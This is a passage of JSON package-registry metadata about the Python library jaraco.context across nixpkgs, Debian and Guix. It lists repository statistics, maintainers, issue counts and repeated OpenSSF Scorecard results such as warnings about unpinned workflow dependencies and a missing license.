.github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-08-06T19:26:18.264Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/python311Packages.jaraco-context?channel=23.05\u0026repository_url=https://channels.nixos.org/nixos-23.05","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/python311Packages.jaraco-context","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/python311Packages.jaraco-context","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/python311Packages.jaraco-context/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/python311Packages.jaraco-context/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/python311Packages.jaraco-context/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/python311Packages.jaraco-context/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/python311Packages.jaraco-context/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/python311Packages.jaraco-context/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/python311Packages.jaraco-context/codemeta","maintainers":[{"uuid":"fabaff","login":null,"name":"Fabian Affolter","email":"mail@fabian-affolter.ch","url":"https://github.com/fabaff","packages_count":3335,"html_url":null,"role":null,"created_at":"2026-03-03T08:23:58.124Z","updated_at":"2026-03-03T08:23:58.124Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/maintainers/fabaff/packages"}],"registry":{"name":"nixpkgs-23.05","url":"https://channels.nixos.org/nixos-23.05","ecosystem":"nixpkgs","default":false,"packages_count":101092,"maintainers_count":2622,"namespaces_count":0,"keywords_count":613,"github":"NixOS","metadata":{"funded_packages_count":2146},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.882Z","updated_at":"2026-08-24T05:04:28.515Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/namespaces"}},{"id":13649745,"name":"jaraco.context","ecosystem":"debian","description":null,"homepage":"https://github.com/jaraco/jaraco.context","licenses":null,"normalized_licenses":[],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":["misc"],"namespace":"main","versions_count":1,"first_release_published_at":"2026-02-12T04:42:55.790Z","latest_release_published_at":"2026-02-12T04:42:55.790Z","latest_release_number":"6.0.1-1","last_synced_at":"2026-07-24T21:01:25.876Z","created_at":"2026-02-12T04:42:55.550Z","updated_at":"2026-08-06T19:26:18.319Z","registry_url":"https://tracker.debian.org/pkg/jaraco.context","install_command":"apt-get install jaraco.context","documentation_url":"https://packages.debian.org/trixie/jaraco.context","metadata":{"component":"main","architecture":"all","priority":"optional","binary":"python3-jaraco.context","standards_version":"4.7.0","maintainer":"Jeroen Ploemen \u003cjcfp@debian.org\u003e","build_depends":"debhelper-compat (= 13), dh-python, dh-sequence-python3, pybuild-plugin-pyproject, python3-all, python3-portend \u003c!nocheck\u003e, python3-pytest \u003c!nocheck\u003e, python3-setuptools, python3-setuptools-scm","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-08-06T19:26:18.318Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/debian/jaraco.context?arch=source\u0026distro=debian-13\u0026repository_url=https://packages.debian.org/trixie","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/debian/jaraco.context","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/debian/jaraco.context","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/debian/jaraco.context/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/jaraco.context/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/jaraco.context/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/jaraco.context/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/jaraco.context/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/jaraco.context/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages/jaraco.context/codemeta","maintainers":[],"registry":{"name":"debian-13","url":"https://packages.debian.org/trixie","ecosystem":"debian","default":false,"packages_count":38024,"maintainers_count":0,"namespaces_count":4,"keywords_count":1985,"github":"debian","metadata":{"codename":"trixie","funded_packages_count":1681},"icon_url":"https://github.com/debian.png","created_at":"2026-02-04T11:01:50.448Z","updated_at":"2026-08-24T05:05:13.674Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/debian-13/namespaces"}},{"id":13953203,"name":"python-jaraco-context","ecosystem":"guix","description":"Context managers Python library","homepage":"https://github.com/jaraco/jaraco.context","licenses":"expat","normalized_licenses":["Other"],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2026-03-02T19:49:02.818Z","latest_release_published_at":"2026-03-02T19:49:02.818Z","latest_release_number":"6.0.1","last_synced_at":"2026-08-22T00:31:58.549Z","created_at":"2026-03-02T19:49:02.646Z","updated_at":"2026-08-22T00:31:58.549Z","registry_url":"https://packages.guix.gnu.org/packages/python-jaraco-context/6.0.1/","install_command":"guix install python-jaraco-context","documentation_url":"https://git.savannah.gnu.org/cgit/guix.git/tree/gnu/packages/python-build.scm#n1594","metadata":{"location":"gnu/packages/python-build.scm:1594","variable_name":"python-jaraco-context"},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses 